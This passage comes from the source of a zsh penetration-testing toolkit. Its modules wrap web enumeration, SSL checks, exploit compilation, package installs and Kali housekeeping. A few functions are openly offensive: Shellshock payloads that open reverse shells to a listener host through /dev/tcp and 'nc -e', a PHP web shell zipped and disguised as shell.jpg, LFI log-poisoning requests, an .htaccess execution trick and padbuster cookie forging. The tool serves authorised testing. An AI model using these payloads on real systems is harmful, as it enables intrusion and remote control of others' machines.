" > payload.php zip payload.zip payload.php mv payload.zip shell.jpg __info "Created shell.jpg" __warn "First upload shell.jpg to target" print -z "curl -k -v -XGET \"${__URL}zip://shell.jpg%23payload.php?cmd=\" " } qq-enum-web-php-lfi-logfile() { __ask "URL should contain a URI like /page.php?lfi=" qq-vars-set-url local b && __askvar b "TARGET URL" curl -s "${b}/" __info "lfi request completed" print -z "curl -k -v \"${__URL}../../../../../var/log/apache2/access.log&cmd=whoami\" " } qq-enum-web-php-gen-htaccess() { local e && __askvar e Extension __ask "Upload .htaccess file to make alt extension executable by PHP" print -z "echo \"AddType application/x-httpd-php ${e}\" > htaccess" } qq-enum-web-php-phpinfo() { print -z "echo \"

PHP INFO PAGE


\" > phpinfo.php" } ================================================ FILE: modules/qq-enum-web-ssl.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-ssl ############################################################# qq-enum-web-ssl-help() { cat << "DOC" qq-enum-web-ssl ---------------- The enum-web-ssl namespace contains commands for enumerating SSL/TLS. Commands -------- qq-enum-web-ssl-install: installs dependencies qq-enum-web-ssl-tcpdump: capture traffic to and from target qq-enum-web-ssl-der-to-crt: convert a .der file to .crt qq-enum-web-ssl-crt-ca-install: install a root certificate (.crt) qq-enum-web-ssl-certs: display cert from a url qq-enum-web-ssl-cert-download: download certs from a url qq-enum-web-ssl-testssl-full: qq-enum-web-ssl-testssl-ciphers: DOC } qq-enum-web-ssl-install() { __info "Running $0..." __pkgs curl nmap tcpdump openssl testssl } qq-enum-web-ssl-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 443 -w $(__hostpath)/ssl.pcap" } qq-enum-web-ssl-der-to-crt() { __ask "Select the cacert.der file" local f && __askpath f FILE $(pwd) print -z "sudo openssl x509 -inform DER -in ${f} -out cacert.crt" } qq-enum-web-ssl-crt-ca-install() { __ask "Select the cacert.crt file" local f && __askpath f FILE $(pwd) print -z "sudo cp ${f} /usr/local/share/ca-certificates/. 
&& sudo update-ca-certificates" } qq-enum-web-ssl-certs() { qq-vars-set-url print -z "openssl s_client -showcerts -connect ${__URL}:443" } qq-enum-web-ssl-cert-download() { __check-project qq-vars-set-url local d=$(echo "${__URL}" | cut -d/ -f3) print -z "openssl s_client -servername ${d} -connect ${d}:443 $(__urlpath)/ssl.certificate.`date +"%Y%m%d-%H%M%S"`.pem" } qq-enum-web-ssl-testssl-full() { __check-project qq-vars-set-url print -z "testssl --color=3 -oA $(__urlpath)/testssl.full.`date +"%Y%m%d-%H%M%S"` ${__URL} " } qq-enum-web-ssl-testssl-ciphers() { __check-project qq-vars-set-url print -z "testssl -E --color=3 -oA $(__urlpath)/testssl.ciphers.`date +"%Y%m%d-%H%M%S"` ${__URL} " } ================================================ FILE: modules/qq-enum-web-vuln.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-vuln ############################################################# qq-enum-web-vuln-help() { cat << "DOC" qq-enum-web-vuln ---------------- The enum-web-vuln namespace contains commands for discovering web vulnerabilities. Commands -------- qq-enum-web-vuln-install: installs dependencies qq-enum-web-vuln-nikto: scan a target for web vulnerabilities qq-enum-web-vuln-nmap-rfi: scan for potential rfi uri's qq-enum-web-vuln-shellshock-agent: create a shellshock payload for user-agent qq-enum-web-vuln-shellshock-nc: attempt shellshock with a reverse shell payload qq-enum-web-vuln-put-curl: attempt to PUT a file with curl qq-enum-web-vuln-padbuster-check: test for padbuster qq-enum-web-vuln-padbuster-forge: exploit with padbuster DOC } qq-enum-web-vuln-install() { __info "Running $0..." 
__pkgs nikto curl nmap padbuster } qq-enum-web-vuln-nikto() { __check-project qq-vars-set-url print -z "nikto -useragent \"${__UA}\" -h \"${__URL}\" -o $(__urlpath)/nikto.txt" } qq-enum-web-vuln-nmap-rfi() { qq-vars-set-rhost print -z "nmap -vv -n -Pn -p80 --script http-rfi-spider --script-args http-rfi-spider.url='/' ${__RHOST}" } qq-enum-web-vuln-shellshock-agent() { qq-vars-set-lhost qq-vars-set-lport __ok "Copy the header value below to use in your exploit" cat << DOC User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/${__LHOST}/${__LPORT} 0>&1 DOC } qq-enum-web-vuln-shellshock-nc() { qq-vars-set-lhost qq-vars-set-lport qq-vars-set-rhost __warn "Start a netcat listener for ${__LHOST}:${__LPORT}" print -z "curl -A '() { :; }; /bin/bash -c \"/usr/bin/nc ${__LHOST} ${__LPORT} -e /bin/bash\"' \"http://${__RHOST}/cgi-bin/status\"" } qq-enum-web-vuln-put-curl() { qq-vars-set-rhost local f && __askpath f FILE $(pwd) print -z "curl -L -T ${f} \"http://${__RHOST}/${f}\" " } qq-enum-web-vuln-padbuster-check() { qq-vars-set-rhost local cn && __askvar cn "COOKIE NAME" local cv && __askvar cv "COOKIE VALUE" print -z "padbuster ${__RHOST} ${cv} 8 -cookies ${cn}=${cv} -encoding 0" } qq-enum-web-vuln-padbuster-forge() { qq-vars-set-rhost local cn && __askvar cn "COOKIE NAME" local cv && __askvar cv "COOKIE VALUE" __check-user print -z "padbuster ${__RHOST} ${cv} 8 -cookies ${cn}=${cv} -encoding 0 -plaintext user=${__USER}" } ================================================ FILE: modules/qq-enum-web.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web ############################################################# qq-enum-web-help() { cat << "DOC" qq-enum-web ----------- The qq-enum-web namespace contains commands for scanning and enumerating http services. 
Commands -------- qq-enum-web-install: installs dependencies qq-enum-web-tcpdump: capture traffic to and from a host qq-enum-web-nmap-sweep: nmap sweep scan to discover web servers on a network qq-enum-web-whatweb: enumerate web server and platform information qq-enum-web-waf: enumerate WAF information qq-enum-web-vhosts-gobuster: brute force for virtual hosts qq-enum-web-eyewitness: scrape screenshots from target URL qq-enum-web-wordpress: enumerate Wordpress information qq-enum-web-headers: grab headers from a target url using curl qq-enum-web-mirror: mirrors the target website locally DOC } qq-enum-web-install() { __info "Running $0..." __pkgs tcpdump nmap whatweb wafw00f gobuster eyewitness wpscan wget curl seclists wordlists go get -u github.com/jaeles-project/gospider go get -u github.com/hakluke/hakrawler } qq-enum-web-nmap-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sS -p80,443,8080 ${__NETWORK} -oA $(__netpath)/web-sweep" } qq-enum-web-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 80 -w $(__hostpath)/web.pcap" } qq-enum-web-whatweb() { __check-project qq-vars-set-url print -z "whatweb ${__URL} -a 3 | tee $(__urlpath)/whatweb.txt" } qq-enum-web-waf() { __check-project qq-vars-set-url print -z "wafw00f ${__URL} -o $(__urlpath)/waf.txt" } # vhosts qq-enum-web-vhosts-gobuster() { __check-project qq-vars-set-url local w && __askpath w FILE /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt __check-threads print -z "gobuster vhost -u ${__URL} -w ${w} -a \"${__UA}\" -t ${__THREADS} -o $(__urlpath)/vhosts.txt" } # screens qq-enum-web-eyewitness() { __check-project qq-vars-set-url mkdir -p $(__urlpath)/screens print -z "eyewitness --web --no-dns --no-prompt --single ${__URL} -d $(__urlpath)/screens --user-agent \"${__UA}\" " } # apps qq-enum-web-wordpress() { __check-project qq-vars-set-url print -z "wpscan --ua \"${__UA}\" --url ${__URL} 
--enumerate tt,vt,u,vp -o $(__urlpath)/wpscan.txt" } qq-enum-web-headers() { __check-project qq-vars-set-url print -z "curl -s -X GET -I -L -A \"${__UA}\" \"${__URL}\" | tee $(__urlpath)/headers.txt" } qq-enum-web-mirror() { __warn "The destination site will be mirrored in the current directory" qq-vars-set-url print -z "wget -mkEpnp ${__URL} " } qq-enum-web-gospider() { __check-project qq-vars-set-url print -z "gospider -s "${__URL}" -o $(__urlpath)/spider.txt" } qq-enum-web-hakrawler() { __check-project qq-vars-set-url local d && __askvar d DEPTH print -z "hakrawler -url "${__URL}" -depth ${d} -linkfinder -usewayback | tee $(__urlpath)/hakrawler.txt" } ================================================ FILE: modules/qq-exploit.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-exploit ############################################################# qq-exploit-help() { cat << "DOC" qq-exploit ---------- The exploit namespace provides commands that assist with compilation and cross-compilation commands for exploits. Commands -------- qq-exploit-install: installs dependencies qq-exploit-searchsploit-nmap: use searchsploit with an nmap xml results file qq-exploit-compile-gcc: compile a linux exploit qq-exploit-compile-gcc-32: compile a linux 32 exploit on 64 qq-exploit-compile-c-win32: cross compile a C win32 exploit qq-exploit-compile-c-win64: cross compile a C wind64 exploit qq-exploit-compile-c++-win32: cross compile a C++ win32 exploit qq-exploit-compile-c++-win64: cross compile a C++ win64 exploit DOC } qq-exploit-install() { __info "Running $0..." 
sudo dpkg --add-architecture i386 sudo apt-get update __pkgs exploitdb __pkgs mingw-w64 gcc gcc-multilib g++-multilib } qq-exploit-searchsploit-nmap() { __check-project __ask "Select nmap xml scan results file" local f && __askpath f FILE ${__PROJECT} print -z "searchsploit -x --nmap ${f}" } qq-exploit-compile-gcc() { __check-project mkdir -p ${__PROJECT}/exploits local src && __askpath src SOURCE ${__PROJECT}/exploits local out && __askpath out OUTPUT ${__PROJECT}/exploits print -z "gcc -o ${out} ${src}" } qq-exploit-compile-gcc-32() { __check-project mkdir -p ${__PROJECT}/exploits local src && __askpath src SOURCE ${__PROJECT}/exploits local out && __askpath out OUTPUT ${__PROJECT}/exploits print -z "gcc -m32 -o ${out} ${src}" } qq-exploit-compile-c-win32() { __check-project mkdir -p ${__PROJECT}/exploits local src && __askpath src SOURCE ${__PROJECT}/exploits local out && __askpath out OUTPUT ${__PROJECT}/exploits print -z "i686-w64-mingw32-gcc ${src} -o ${out}" } qq-exploit-compile-c-win64() { __check-project mkdir -p ${__PROJECT}/exploits local src && __askpath src SOURCE ${__PROJECT}/exploits local out && __askpath out OUTPUT ${__PROJECT}/exploits print -z "x86_64-w64-mingw32-gcc ${src} -o ${out}" } qq-exploit-compile-c++-win32() { __check-project mkdir -p ${__PROJECT}/exploits local src && __askpath src SOURCE ${__PROJECT}/exploits local out && __askpath out OUTPUT ${__PROJECT}/exploits print -z "i686-w64-mingw32-g++ ${src} -o ${out}" } qq-exploit-compile-c++-win64() { __check-project mkdir -p ${__PROJECT}/exploits local src && __askpath src SOURCE ${__PROJECT}/exploits local out && __askpath out OUTPUT ${__PROJECT}/exploits print -z "x86_64-w64-mingw32-g++ ${src} -o ${out}" } qq-exploit-compile-notes-winsock() { __info "use -lws2_32" } qq-exploit-compile-notes-static() { __info "-static-libstdc++" __info "-static-libgcc" } ================================================ FILE: modules/qq-install.zsh ================================================ 
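The qq-install.zsh module that follows persists PATH additions by appending an `export PATH=...` line to ~/.zshrc (`__addpath`, qq-install-golang, qq-install-node; qq-kali-path-add does the same). Appending unconditionally duplicates the line on every re-run of an installer, and the live PATH grows with duplicate entries. The idempotent variant below is an added example and not part of quiver; it is written in bash so it can be exercised against a temporary rc file, and the rc path, the `/opt/tools/...` directories and the function names are assumptions for the example.

```shell
#!/usr/bin/env bash
# Added example (not quiver's own code): idempotent PATH persistence.
# Assumptions: the rc file path is passed explicitly (tests use a temp file)
# and directories are appended, as the plugin does, rather than prepended.

# path_contains "<PATH string>" "<dir>": 0 if dir is already a PATH element.
# Wrapping both sides in ":" makes the match exact, so /opt/tools/massdns is
# not mistaken for /opt/tools/massdns/bin.
path_contains() {
  case ":$1:" in
    *":$2:"*) return 0 ;;
    *)        return 1 ;;
  esac
}

# addpath_once "<rc file>" "<dir>": persist and apply a PATH addition once.
addpath_once() {
  local rc="$1" dir="$2"
  local line="export PATH=\$PATH:$dir"
  # -F -x: fixed-string, whole-line match, so an rc line for a parent or
  # child directory does not count as "already present".
  if ! grep -qFx -- "$line" "$rc" 2>/dev/null; then
    printf '%s\n' "$line" >> "$rc"
  fi
  if ! path_contains "$PATH" "$dir"; then
    export PATH="$PATH:$dir"
  fi
}

# count_rc_entries "<rc file>" "<dir>": number of export lines for dir in rc.
count_rc_entries() {
  grep -cFx -- "export PATH=\$PATH:$2" "$1" 2>/dev/null || true
}
```

Replacing the body of `__addpath` with `addpath_once ~/.zshrc "$1"` keeps the plugin's behaviour for a first install and makes `qq-install-all` safe to re-run.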
#!/usr/bin/env zsh ############################################################# # qq-install ############################################################# qq-install-help() { cat << "DOC" qq-install ---------- The qq-install namespace provides commands that assist with installing packages, repos and tools used in quiver. Commands -------- qq-install-all: Installs all dependencies in all modules, calling qq-*-install qq-install-git-pull-tools: Updates all install tools that are git repos qq-install-dev: Installs python3, php, npm and libraries qq-install-essentials: Installs useful utilities qq-install-golang: Installs golang and environment variables needed for "go get" qq-install-node: Installs nodejs and npm with a per-user global prefix Tools ----- These installers are for individual tools. qq-install-wordlist-commonspeak qq-install-wordlist-nerdlist qq-install-massdns qq-install-github-search qq-install-s3scanner qq-install-gf qq-install-git-secrets qq-install-gitrob qq-install-pentest-tools qq-install-protonvpn qq-install-nmap-elasticsearch-nse qq-install-link-finder qq-install-bat DOC } ##### Helpers # append a directory to PATH once: skip the rc file write when the exact line is already present __addpath() { grep -qFx "export PATH=\$PATH:$1" ~/.zshrc 2> /dev/null || echo "export PATH=\$PATH:$1" | tee -a ~/.zshrc export PATH=$PATH:$1 } # query dpkg for the exact package name and state; "dpkg -l | grep -w" also matched substrings such as "go" in "golang-go" and packages left in the removed (rc) state __pkgs(){ __info "checking for and installing dependencies..." for pkg in "$@" do __info "$pkg" dpkg-query -W -f='${Status}' $pkg 2> /dev/null | grep -q "install ok installed" && __warn "already installed" || sudo apt-get -y install $pkg done } qq-install-all() { __cyan "This will install/update all modules." __cyan "Ensure you have free disk space before proceeding." __ask "CONTINUE?" if __check-proceed then __info "Installing all modules..."
#qq-encoding-install qq-enum-dhcp-install qq-enum-dns-install qq-enum-ftp-install qq-enum-host-install qq-enum-kerb-install qq-enum-ldap-install qq-enum-mssql-install qq-enum-mysql-install qq-enum-network-install qq-enum-nfs-install qq-enum-oracle-install qq-enum-pop3-install qq-enum-rdp-install qq-enum-smb-install qq-enum-web-aws-install qq-enum-web-dirs-install qq-enum-web-elastic-install qq-enum-web-fuzz-install qq-enum-web-js-install qq-enum-web-vuln-install qq-enum-web-php-install qq-enum-web-ssl-install qq-enum-web-install qq-exploit-install #qq-kali-install qq-notes-install qq-log-install qq-pivot-install qq-project-install qq-recon-domains-install qq-recon-github-install qq-recon-networks-install qq-recon-org-install qq-recon-subs-install qq-shell-handlers-msf-install qq-shell-handlers-install #qq-shell-tty-install qq-srv-install __info "Install finished" fi } qq-install-git-pull-tools() { __cyan "This will git-pull all repos in ${__TOOLS}." __ask "CONTINUE?" if __check-proceed then cd ${__TOOLS} for d in $(ls -d */) do cd $d __ok "Pulling ${d}" git pull cd - done cd ${__TOOLS} fi } qq-install-dev(){ __cyan "This will install python3, php, npm and libraries." __ask "CONTINUE?" if __check-proceed then __pkgs python3 python3-pip php php-curl libldns-dev libssl-dev libcurl4-openssl-dev npm fi } qq-install-essentials(){ __cyan "This installs common utilities such as jq, tmux, tree, dtach and more." __ask "CONTINUE?" if __check-proceed then __pkgs jq pigz fonts-powerline unzip tmux dtach tree fi } ##### Individual Tools qq-install-golang() { __pkgs golang if [[ -z "$GOPATH" ]] then echo "export GOPATH=\$HOME/go" | tee -a $HOME/.zshrc echo "export PATH=\$PATH:/usr/local/go/bin:\$GOPATH/bin" | tee -a $HOME/.zshrc export GOPATH=$HOME/go export PATH=$PATH:/usr/local/go/bin:$HOME/go/bin fi } # npm places global binaries under <prefix>/bin, so that is the directory that belongs on PATH qq-install-node() { __pkgs nodejs npm cd $HOME mkdir -p $HOME/.npm-global npm config set prefix '~/.npm-global' if ! echo $PATH | grep -q "npm-global/bin" then echo "export PATH=\$PATH:\$HOME/.npm-global/bin" | tee -a $HOME/.zshrc export PATH=$PATH:$HOME/.npm-global/bin fi } qq-install-wordlist-commonspeak() { local name="commonspeak2" local url="https://github.com/assetnote/commonspeak2-wordlists.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p else __warn "already installed in $p" pushd $p git pull popd fi } qq-install-wordlist-nerdlist() { local name="nerdlist" local url="https://github.com/tarahmarie/nerdlist.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p else __warn "already installed in $p" pushd $p git pull popd fi } qq-install-massdns() { local name="massdns" local url="https://github.com/blechschmidt/massdns.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p #after commands pushd $p make popd __addpath $p/bin else __warn "already installed in $p" pushd $p git pull make popd fi } qq-install-github-search() { local name="github-search" local url="https://github.com/gwen001/github-search.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p #after commands pushd $p pip3 install -r requirements.txt popd __addpath $p else __warn "already installed in $p" pushd $p git pull pip3 install -r requirements.txt popd fi } qq-install-s3scanner() { local name="S3Scanner" local url="https://github.com/sa7mon/S3Scanner.git" local p="$__TOOLS/$name" __info "$name" if [[ !
-d $p ]] then git clone $url $p #after commands pushd $p pip3 install -r requirements.txt popd __addpath $p else __warn "already installed in $p" pushd $p git pull pip3 install -r requirements.txt popd fi } qq-install-gf() { local name="gf" __info "$name" go get -u github.com/tomnomnom/gf echo "source \$GOPATH/src/github.com/tomnomnom/gf/gf-completion.zsh" >> $HOME/.zshrc cp -r $GOPATH/src/github.com/tomnomnom/gf/examples $HOME/.gf } qq-install-git-secrets() { local name="git-secrets" local url="https://github.com/awslabs/git-secrets.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p #after commands pushd $p sudo make install popd __addpath $p else __warn "already installed in $p" pushd $p git pull sudo make install popd fi } qq-install-gitrob() { local name="gitrob" __info "$name" go get -u github.com/golang/dep/cmd/dep go get -u github.com/codeEmitter/gitrob pushd ~/go/src/github.com/codeEmitter/gitrob dep ensure go build popd } qq-install-pentest-tools() { local name="pentest-tools" local url="https://github.com/gwen001/pentest-tools.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p #after commands __addpath $p else __warn "already installed in $p" pushd $p git pull popd fi } qq-install-protonvpn() { local name="protonvpn" __info "$name" sudo apt install -y openvpn dialog python3-pip python3-setuptools sudo pip3 install protonvpn-cli __warn "ProtonVPN username and password required" print -z "sudo protonvpn init" } qq-install-nmap-elasticsearch-nse() { local name="nmap-elasticsearch-nse" local url="https://github.com/theMiddleBlue/nmap-elasticsearch-nse.git" local p="$__TOOLS/$name" __info "$name" if [[ ! 
-d $p ]] then git clone $url $p #after commands pushd $p sudo cp elasticsearch.nse /usr/share/nmap/scripts/ popd else __warn "already installed in $p" pushd $p git pull sudo cp elasticsearch.nse /usr/share/nmap/scripts/ popd fi } qq-install-link-finder() { local name="LinkFinder" local url="https://github.com/GerbenJavado/LinkFinder.git" local p="$__TOOLS/$name" __info "$name" if [[ ! -d $p ]] then git clone $url $p #after commands pushd $p sudo python3 setup.py install pip3 install -r requirements.txt popd else __warn "already installed in $p" pushd $p git pull python3 setup.py install pip3 install -r requirements.txt popd fi } qq-install-bat() { local name="bat" __info "$name" cd $HOME wget https://github.com/sharkdp/bat/releases/download/v0.15.0/bat_0.15.0_amd64.deb sudo dpkg -i bat_0.15.0_amd64.deb rm bat_0.15.0_amd64.deb cd - } ================================================ FILE: modules/qq-kali.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-kali ############################################################# qq-kali-help() { cat << "DOC" qq-kali ---------- The qq-kali namespace provides commands that assist with managing Kali linux. 
Commands -------- qq-kali-pkg-upgrade: update and full-upgrade with autoremove qq-kali-pkg-query: query if a package is installed or not qq-kali-pkg-fix: fix broken packages qq-kali-pkg-go-update: update go modules and packages with go get qq-kali-fs-mounted: show mounted file systems qq-kali-fs-usage: show file system usage totals qq-kali-fs-last3: show files modified in last 3 days in /etc qq-kali-fs-large: show files larger than 1GB in the root fs qq-kali-mem-top10: show top10 processes by memory usage qq-kali-mem-free: show overall memory usage qq-kali-disk-top10: show top 10 files by size in current directory qq-kali-ps-tree: show a process tree qq-kali-ps-grep: search list of processes qq-kali-ps-dtach: run a script in the background qq-kali-net-watch: display network active connections qq-kali-net-open4: display open network connections ipv4 qq-kali-net-open6: display open network connections ipv6 qq-kali-net-routes: display the system routing table qq-kali-net-ss: display open network connections qq-kali-net-lsof: display open network connections qq-kali-net-pubip: query for the public IP qq-kali-pvpn-update: install or update proton vpn cli qq-kali-pvpn-status: check proton vpn status qq-kali-pvpn-connect-tcp: connect to proton vpn using tcp qq-kali-pvpn-connect-udp: connect to proton vpn using udp qq-kali-pvpn-disconnect: disconnect proton vpn qq-kali-path-add: add a new path to the PATH environment variable qq-kali-file-replace: replace an existing value in a file qq-kali-file-dos-to-unix: convert file with dos endings to unix qq-kali-file-unix-to-dos: convert file with unix endings to dos qq-kali-file-sort-uniq: sort a file uniq in place qq-kali-file-sort-uniq-ip: sort a file of IP addresses uniq in place qq-kali-sudoers-easy: removes the sudo password requirement for nmap, masscan and tcpdump (see the warning in the function) qq-kali-sudoers-harden: removes sudo exclusions DOC } qq-kali-pkg-upgrade() { print -z "sudo apt-get update && sudo apt-get full-upgrade && sudo apt-get autoremove" }
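The installers in qq-install.zsh and the qq-kali-pkg-query command below decide whether a package needs installing from dpkg's view of it. The pitfall is testing that with `dpkg -l | grep -qw <name>`: `-w` matches the name as a whole word anywhere in the listing, so `go` matches `golang-go`, and a package left in the rc state (removed, configuration files kept) still matches; both report a missing package as installed and the install is skipped. The example below is added here and is not quiver's own code; it matches the status and name columns exactly, and the dpkg listing and the function names are constructed for the example.

```shell
#!/usr/bin/env bash
# Added example (not quiver's own code): exact installed-package check
# against `dpkg -l`-style output, run offline on a constructed listing.

# Constructed sample of `dpkg -l` output (not captured from a real host).
SAMPLE_DPKG_LIST='Desired=Unknown/Install/Remove/Purge/Hold
||/ Name                Version        Architecture Description
+++-===================-==============-============-=================================
ii  golang-go           2:1.14~1       amd64        Go programming language compiler
rc  nmap                7.80+dfsg1-2   amd64        The Network Mapper
ii  curl                7.68.0-1       amd64        command line tool for transferring data with URL syntax
ii  jq                  1.6-1          amd64        lightweight and flexible command-line JSON processor
ii  libssl-dev:amd64    1.1.1f-1       amd64        Secure Sockets Layer toolkit - development files'

# pkg_installed "<dpkg listing>" "<package>": 0 only when the package is
# listed with status "ii". The Name column is compared whole (after dropping a
# multiarch ":arch" suffix), so "go" does not match "golang-go", and an "rc"
# entry is not treated as installed.
pkg_installed() {
  printf '%s\n' "$1" | awk -v want="$2" '
    $1 == "ii" {
      name = $2; sub(/:.*$/, "", name)   # drop multiarch suffix
      if (name == want) { found = 1; exit }
    }
    END { if (found) exit 0; exit 1 }'
}

# The substring check the plugin relies on, kept here for comparison.
pkg_installed_grep_w() {
  printf '%s\n' "$1" | grep -qw "$2"
}

# missing_pkgs "<dpkg listing>" pkg...: prints the packages that still need
# installing, space separated, so a caller can run one apt-get for all of them.
missing_pkgs() {
  local listing="$1"; shift
  local missing=""
  for p in "$@"; do
    pkg_installed "$listing" "$p" || missing="$missing $p"
  done
  printf '%s' "${missing# }"
}
```

On a live host the same decision is available without parsing the table at all: `dpkg-query -W -f='${Status}' <pkg>` prints `install ok installed` exactly when the package is installed, which is what the listing parser above reproduces.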
qq-kali-pkg-query() { local query && __askvar query PACKAGE for pkg in ${=query} do dpkg-query -W -f='${Status}' $pkg 2> /dev/null | grep -q "install ok installed" && __ok "${pkg} is installed" || __warn "${pkg} not installed" done } qq-kali-pkg-fix() { print -z "sudo apt-get install --fix-broken && sudo apt-get autoremove && sudo apt-get update" } qq-kali-pkg-go-update() { print -z "go get -u all" } qq-kali-fs-mounted() { print -z "sudo mount | column -t" } qq-kali-fs-usage() { print -z "df -mTh --total" } qq-kali-fs-last3() { print -z "sudo find /etc -mtime -3" } qq-kali-fs-large() { print -z "sudo find / -type f -size +1G" } qq-kali-mem-top10() { print -z "sudo ps aux | sort -rk 4,4 | head -n 10 | awk '{print \$4,\$11}' " } qq-kali-mem-free() { print -z "free -th" } qq-kali-disk-top10() { print -z "sudo du -sk ./* | sort -r -n | head -10" } qq-kali-ps-tree() { print -z "ps auxf" } qq-kali-ps-grep() { local query && __askvar query QUERY print -z "ps aux | grep -v grep | grep -i -e VSZ -e ${query}" } # dtach -n starts a detached session on a socket; the script path is the command, not the socket qq-kali-ps-dtach() { __ask "Enter full path to script to run dtach'd" local p && __askpath p PATH $(pwd) dtach -n ${p}.dtach /bin/zsh ${p} __info "reattach with: dtach -a ${p}.dtach" } qq-kali-net-watch() { print -z "sudo watch -n 0.3 'netstat -pantlu4 | grep \"ESTABLISHED\|LISTEN\"' " } qq-kali-net-open4() { print -z "sudo netstat -pantlu4"} qq-kali-net-open6() { print -z "sudo netstat -pantlu6"} qq-kali-net-routes() { print -z "netstat -r --numeric-hosts" } qq-kali-net-ss() { print -z "sudo ss -plaunt4" } qq-kali-net-lsof() { print -z "sudo lsof -P -i -n "} qq-kali-net-pubip() { print -z "curl -s \"https://icanhazip.com\" "} qq-kali-pvpn-update() { print -z "sudo pip3 install protonvpn-cli --upgrade" } qq-kali-pvpn-status() { print -z "sudo protonvpn status" } qq-kali-pvpn-connect-tcp() { print -z "sudo protonvpn c -f" } qq-kali-pvpn-connect-udp() { print -z "sudo protonvpn c -f -p udp" } qq-kali-pvpn-disconnect() { print -z "sudo protonvpn disconnect" } qq-kali-path-add() { __ask "Enter new path to append to current PATH" local p && __askpath p PATH / print -z "echo
\"export PATH=\$PATH:${p}\" | tee -a $HOME/.zshrc" } qq-kali-file-replace() { local replace && __askvar replace REPLACE local with && __askvar with WITH local file && __askpath file FILE $(pwd) print -z "sed 's/${replace}/${with}/g' ${file} > ${file}" } qq-kali-file-dos-to-unix() { local file=$1 [[ -z "${file}" ]] && __askpath file FILE $(pwd) print -z "tr -d \"\015\" < ${file} > ${file}.unix" } qq-kali-file-unix-to-dos() { local file=$1 [[ -z "${file}" ]] && __askpath file FILE $(pwd) print -z "sed -e 's/$/\r/' ${file} > ${file}.dos" } qq-kali-file-sort-uniq() { local file=$1 [[ -z "${file}" ]] && __askpath file FILE $(pwd) print -z "cat ${file} | sort -u -o ${file}" } qq-kali-file-sort-uniq-ip() { local file=$1 [[ -z "${file}" ]] && __askpath file FILE $(pwd) print -z "cat ${file} | sort -u | sort -V -o ${file}" } qq-kali-sudoers-easy() { __warn "This is dangerous for OPSEC! Remove when done." print -z "echo \"$USER ALL=(ALL:ALL) NOPASSWD: /usr/bin/nmap, /usr/bin/masscan, /usr/sbin/tcpdump\" | sudo tee /etc/sudoers.d/$(whoami)" } alias easymode="qq-bounty-sudoers-easy" qq-kali-sudoers-harden() { print -z "sudo rm /etc/sudoers.d/$(whoami)" } alias hardmode="qq-bounty-sudoers-harden" ================================================ FILE: modules/qq-log.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-log ############################################################# qq-log-help() { cat << "DOC" qq-log ------------- The log namespace provides commands that create a logbook in a directory specified by the __LOGBOOK variable. Use qq-log to append entries to the logbook. Display the log with qq-log-cat. Edit the log with qq-log-edit. 
Commands -------- qq-log-install: installs dependencies qq-log: alias ql, appends $@ to an entry in the logbook qq-log-cat: alias qlc, cats the logbook qq-log-edit: alias qle, edits the logbook using $EDITOR qq-log-set: alias qls, creates or uses existing logbook.md in the path specified DOC } qq-log-install() { __info "Running $0..." qq-install-golang go get -u github.com/charmbracelet/glow } qq-log-set() { qq-vars-set-logbook } alias qls="qq-log-set" qq-log-cat() { __check-logbook __info "${__LOGBOOK}" glow ${__LOGBOOK} } alias qlc="qq-log-cat" qq-log-edit() { __check-logbook $EDITOR ${__LOGBOOK} } alias qle="qq-log-edit" qq-log() { __check-logbook local stamp=$(date +'%m-%d-%Y : %r') echo "## ${stamp}" >> ${__LOGBOOK} echo "\`\`\`" >> ${__LOGBOOK} echo "$@" >> ${__LOGBOOK} echo "\`\`\`" >> ${__LOGBOOK} echo " " >> ${__LOGBOOK} } alias ql="qq-log" ================================================ FILE: modules/qq-notes.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-notes ############################################################# qq-notes-help() { cat << "DOC" qq-notes ------- The notes namespace provides searching and reading of markdown notes that are stored in a directory specified by the __NOTES environment variable (qq-vars-global). Commands -------- qq-notes-install: installs dependencies qq-notes: lists all notes in $__NOTES or searches notes by filename if $1 is supplied qq-notes-content: list all notes in $__NOTES or searches notes by content if $1 is supplied qq-notes-menu: display an interactive menu for reading notes DOC } qq-notes-install() { __info "Running $0..." __pkgs fzf ripgrep qq-install-golang go get -u github.com/charmbracelet/glow qq-install-bat } # leave the select loop on a valid choice; an EOF leaves note empty and the caller simply returns (never exit the interactive shell) qq-notes() { __notes-check __info "Use \$1 to search file names" select note in $(ls -R --file-type ${__NOTES} | grep -ie ".md$" | grep -i "$1") do [[ -n ${note} ]] && break done [[ !
-z ${note} ]] && glow ${__NOTES}/${note} } qq-notes-content() { __notes-check __info "Use \$1 to search content" select note in $(grep -rliw "$1" ${__NOTES}/*.md) do [[ -n ${note} ]] && break done [[ ! -z ${note} ]] && glow ${note} } # {1} is fzf's placeholder for the first ':'-delimited field (the file name) qq-notes-menu() { __notes-check pushd ${__NOTES} &> /dev/null rg --no-heading --no-line-number --with-filename --color=always --sort path -m1 "" *.md | fzf --tac --no-sort -d ':' --ansi --preview-window wrap --preview 'bat --style=plain --color=always {1}' popd &> /dev/null } ================================================ FILE: modules/qq-pivot.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-pivot ############################################################# qq-pivot-help() { cat << "DOC" qq-pivot ------------ The pivot namespace provides commands for using ssh to proxy and pivot. Commands -------- qq-pivot-install: installs dependencies qq-pivot-mount-remote-sshfs: mounts a remote directory to local 